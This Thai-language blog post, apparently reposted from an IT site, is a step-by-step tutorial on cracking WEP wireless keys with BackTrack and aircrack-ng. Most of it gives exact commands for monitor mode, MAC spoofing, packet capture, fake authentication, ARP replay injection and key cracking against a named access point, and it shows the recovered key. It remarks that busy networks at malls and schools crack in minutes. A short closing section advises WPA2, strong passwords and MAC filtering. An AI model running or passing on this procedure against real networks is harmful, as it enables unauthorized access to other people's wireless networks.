สวัสดีครับ วันนี้ผมมีวิธีแฮก wireless แบบ WEP และวิธีป้องกันแนะนำเพื่อนๆครับ ก่อนอื่นเลยต้องขอบอกก่อนเลยว่า บทความนี้ผมเขียนขึ้นมาเพื่อเป็นแนวทางและวิธีสำหรับทดสอบไวเลสเพื่อหาช่องโหว่ของไลเวสและวิธีป้องกันการแฮกจากผู้ไม่หวังดีที่จะแอบแฮกใช้ไวเลสของเรา ซึ่งบทความนี้ผมจะกล่าวถึงวิธีการแฮกไวเลสที่ใช้การเข้ารหัสแบบ WEP ซึ่งเป็นการเข้ารหัสที่ไม่ค่อยปลอดภัยเท่าไหร่ในปัจจุบัน เอาละครับถ้าพร้อมแล้วเราไปเริ่มทดสอบกันเลยครับ
สิ่งที่ต้องใช้ในการทดสอบแฮกไวเลสมีดังต่อไปนี้ครับ
- คอมพิวเตอร์หรือโน้ตบุคที่สามารถเชื่อต่อไวเลส
- ระบบปฏิบัติการ BackTrack แบบ แผ่น Live CD หรือ USB ก็ได้
- Access point หรือ Router ที่มีไวเลสที่เราจะแฮก
ก่อนอื่นให้เราบูท CD หรือ USB ของ BackTrack แล้ว พิมพ์ startx เพื่อเข้าสู่หน้า Desktop
เปิด Terminal ขึ้นมาแล้วพิมพ์ว่า airmon-ng start wlan0 แล้วกด enter ก็จะขึ้นข้อความเหมือนในภาพ
ต่อไปเป็นขั้นตอนในการเปลี่ยน Mac Address ของการ์ดไวเลส ให้พิมพ์ว่า ifconfig mon0 down แล้วกด Enter เพื่อปิดการทำงานก่อนเพราะเราจะทำการเปลี่ยน Mac Address จากนั้นให้เราพิมพ์คำสั่ง macchanger -m xx:xx:xx:xx:xx mon0 ตรง x ให้เราใส่ mac address ที่เราต้องการ ในที่นี้ผมจะใช้ 00:11:22:33:44:55 (ใช้เหมือนผมเลยเพราะจำง่ายดี) เมื่อได้แล้วให้กด Enter ก็จะขึ้น Current MAC: xx:xx:xx:xx:xx ซึ่งเป็น Mac Address เดิมของเรา ละก็ Faked MAC: xx:xx:xx:xx:xx ซึ่งเป็น MAC Address ที่ผมกำหนดไว้
จากนั้นให้พิมพ์คำสั่ง airodump-ng mon0 แล้วกด Enter เพื่อแสกนหาไลเวสที่อยู่ในบริเวณนั้น
จากนั้นก็จะขึ้นรายละเอียดของไลเวสที่อยู่ใบบริเวณนั้น ซึ่งเป้าหมายของผมที่จะแฮกไวเลสในที่นี้ก็คือ ไวเลสที่ชื่อ ITClickMe เหมือนในรูป
รายละเอียดที่ต้องใช้ในการแฮกไวเลสก็คือ
- BSSID ก็คือ MAC Address ของ AP หรือ Router Wireless ที่เราจะแฮก
- CH ก็คือ Chanel ของ AP ที่เราจะแฮก
- ESSID ก็คือ ชื่อของ AP ของเราจะแฮก
ต่อไปให้เราหน้าต่าง Terminal ขึ้นมาอีกอันแล้วพิมพ์คำสั่ง airodump-ng -w "ชื่อไฟล์ตั้งอะไรก็ได้ -c "Chanel ของ AP" mon0 ตัวอย่างของผมในที่นี้คือ airodump-ng -w hack -c 6 mon0 จากนั้นก็กด Enter
จากนั้นก็จะขึ้นเหมือนในภาพให้เราสังเกตุที่ #Data คือจำนวนของ Package ที่เราจะดักจับเพื่อใช้ในการแฮกไวเลส ซึ่งต้อวการอย่างน้อย 5000 นะครับถ้าน้อยกว่านี้อาจจะแฮกไม่สำเร็จ
ต่อไปเป็นขั้นตอนในการเร่งความเร็วของ #Data โดยการส่ง Package จากเครื่องของเราไปที่ AP ก่อนอื่นให้เราตรวจสอบก่อนว่าการ์ดไวเลสของเราสามารถส่ง Package ในการเร่งพาริมิเตอร์ของ Data บน AP ได้หรอป่าว โดยการเปิด Terminal ขึ้นมาใหม่อีกหนึ่งอันแล้วพิมพส์คำสั่ง aireplay-ng -1 0 -e "ชื่อของ AP ที่เราจะแฮก" -a "MAC Addres ของ AP ที่เราจะแฮก" -h "MAC Address ที่เราปลอมขึ้นมาเมื่อตอนแรกๆตะกี้" mon0 ตัวอย่างของผมในที่นี้ก็คือ aireplay-ng -1 0 -e ITClickMe -a B0:48:7A:DB:A4:2B -h 00:11:22:33:44:55 mon0 เมื่อใส่ถูกต้องแล้วกด Enter
จากนั้นหากการ์ดไวเลสเราสามารถส่งคำสั่งเร่งพารามิเตอร์ได้ก็จะขึ้น Authentication successful เหมือนดังภาพครับ หากไม่ขึ้นก็แสดงว่าส่งคำสั่งเร่งพารามิเตอร์ไม่ได้ ต้องรอให้ #Data ครบ 5000 หรือมากกว่า อย่างเดียวเลยแล้วจึงแครกรหัส WEP
หลังจากตรวจสอบแล้วต่อเป็นขั้นตอนในการเร่งพารามิเตอร์ให้ #Data วิ่งเร็วขึ้น โดยให้เราเปิด Terminal ขึ้นมาอีกอัน แล้วพิมพ์คำสั่ง aireplay-ng -3 -b "MAC Address ของ AP ที่กำลังแฮก" -b "MAC Address ของเราที่ตั้งไว้ตอนแรก" mon0 ตัวอย่างของผมในที่นี้ก้คือ aireplay-ng -3 -b B0:48:7A:DB:A4:2B -h 00:11:22:33:44:55 mon0 เมื่อใส่ถูกต้องแล้วกด Enter เลย ก็จะปรากฏ Read xxxx packets (got 0 ARP request and xx ACKs) Sent x packets.... ให้เราเปิดทิ้งไว้ไม่ต้องปิดนะครับเพราะมันกำลังส่ง packets ไปที่ AP เปิดทิ้งไว้แบบนั้นเลย
จากนั้นก็รอให้ #data ครบ 5000 หรือมากว่า แล้วจึงเริ่มทำการแครกรหัส WEP โดยการเปิด Terminal ขึ้นมาอีกอันแล้วพิมพ์คำสั่ง aircrack-ng -z -b "MAC Address ของ AP ที่เรากำลังแฮก" "ชื่อไฟล์ที่เราตั้งไว้ตอนใช้คำสั่ง airodump"*.cap ตัวอย่างของผมในที่นี้ก็คือ aircrack-ng -z -b B0:48:7A:DB:A4:2B hack*.cap เมื่อใส่ถูกต้องครบแล้วกด Enter เพื่อแครกรหัสผ่าน WEP
หลังจากแครกที่จำนวน #Data 5000 หากยังไม่สำเร็จก็จะขึ้น Failed. Next try with 10000 IVs. และหากไม่สำเร็จอีก ก็จะขึ้น Failed. Next try with 15000 IVs. และถ้ายังอีกก็ให้รอไปเรื่อยๆ ครับแต่ส่วนใหญ่แล้วน่าจะไม่เกิน 20000 IVs ครับ
หลังจากนั้นหากสามารถแครกรหัสผ่านได้สำเร็จก็จะขึ้นเหมือนดังภาพ ซึ่งที่ผมทดลองในครั้งนี้ใช้แค่ 15000 IVs ในภาพจะเห็นได้ว่ารหัสผ่านตรง KEY FOUND ก็คือตัวเลขครับ 10 ตัว ซึ่งเป็นมารตฐานของรหัสแบบ WEP คือใช้ 10 ตัว 64 บิท รหัสในที่นี้ก็คือ 0843962995 ครับ
จากนั้นผมก็เอารหัสผ่านดังกล่าวไปลองเชื่อมต่อผ่านเครื่องที่ใช้ Windows ก็สามารถเชื่อมต่อกับ AP(Access Point) ที่ผมได้แฮกเมื่อสักครู่
สรุปการแฮกไวเลสแบบ WEP
การแฮกไวเลสที่เข้ารหัสผ่านแบบ WEP นั้นต้องใช้จำนวน #Data อย่างน้อย 5000 ขึ้นไปถึงจะเห็นผล และหากไวเลสที่เราแฮกนั้นมีคนเชื่อต่ออยู่เย่อะเช่นตามห้าง โรวเรียน ฯลฯ จำนวน #Data ก็จะวิ่งไวมาก ใช้เวลาแฮกไม่ถึง 5 นาทีก็สำเร็จแล้วเพราะ package วิ่งไปมาเย่อะขึ้นกับจำนวนผู้ใช้ในขณะนั้น
วิธีการป้องกันการแฮกไวเลส
อย่างที่เรารู้ๆกันอยู่คือการเข้ารหัสแบบ WEP นั้นไม่ค่อยปลอดภัยมากนัก เป็นสิ่งที่ง่ายมากๆสำหรับแฮกเกอร์ที่จะแฮกไวเลสของเรา เพราะฉะนั้นแล้วเราควรลดความเสี่ยงที่จะถูกโจมตีจากแฮกเกอร์โดยการเปลี่ยนมาใช้การเข้ารหัสแบบ WPA , WPA2 หรือหาก AP ของคุณสามารถใช้การเข้ารหัสแบบ WPA2PSK และตั้งรหัสผ่านยาวๆและคาดเดายากก็ยิ่งเพิ่มความปลอดภัยและลดความเสี่ยงของการถูกแฮก แต่ถึงจะอย่างไรรหัสไวเลสก็ยังสามารถถูกแฮกได้ แต่มันจะยากและใช้เวลามากขึ้นมาอีกเท่านั้นเอง และแฮกเกอร์ที่จะแฮกรหัสผ่านแบบ WPA, WPA2 หรือ WPA2PSK ได้นั้นต้องมีความชำนาญและความรู้เรื่องระบบเครื่อข่ายสูง และอีกอย่างหากแฮกเกอร์คนนั้นจะแฮกจริงๆ ก็ต้องใช้คอมพิวเตอร์ที่มีความเร็วสูงมากๆ เพื่อลดเวลาในการแครกรหัสผ่านยิ่งหากรหัสผ่านนั้นยาวและมีความซับซ้อนก็ยิ่งต้องใช้เวลาในการแครก อาจทำให้แฮกเกอร์นั้นถอนใจไปเลยก็ได้ เพราะฉะนั้นแล้วเราควรลดความเสี่ยงโดยการใช้การเข้ารหัสแบบใหม่ล่าสุดที่ AP ของเราสามารถใช้ได้และตั้งรหัสผ่านที่ขาดเดายากไม่มีใน Dictionary ถ้าจะให้ดีใช้วิธีแบบอนุญาติเฉพาะเครื่องที่เราต้องใช้ไปเลยโดยการใส่ MAC Address ของเราใน AP บวกกับใช้รหัสผ่านไปด้วยก็สามารถลดความเสี่ยงได้เยอะ
ที่มา - itclickme.com
0 ความคิดเห็น: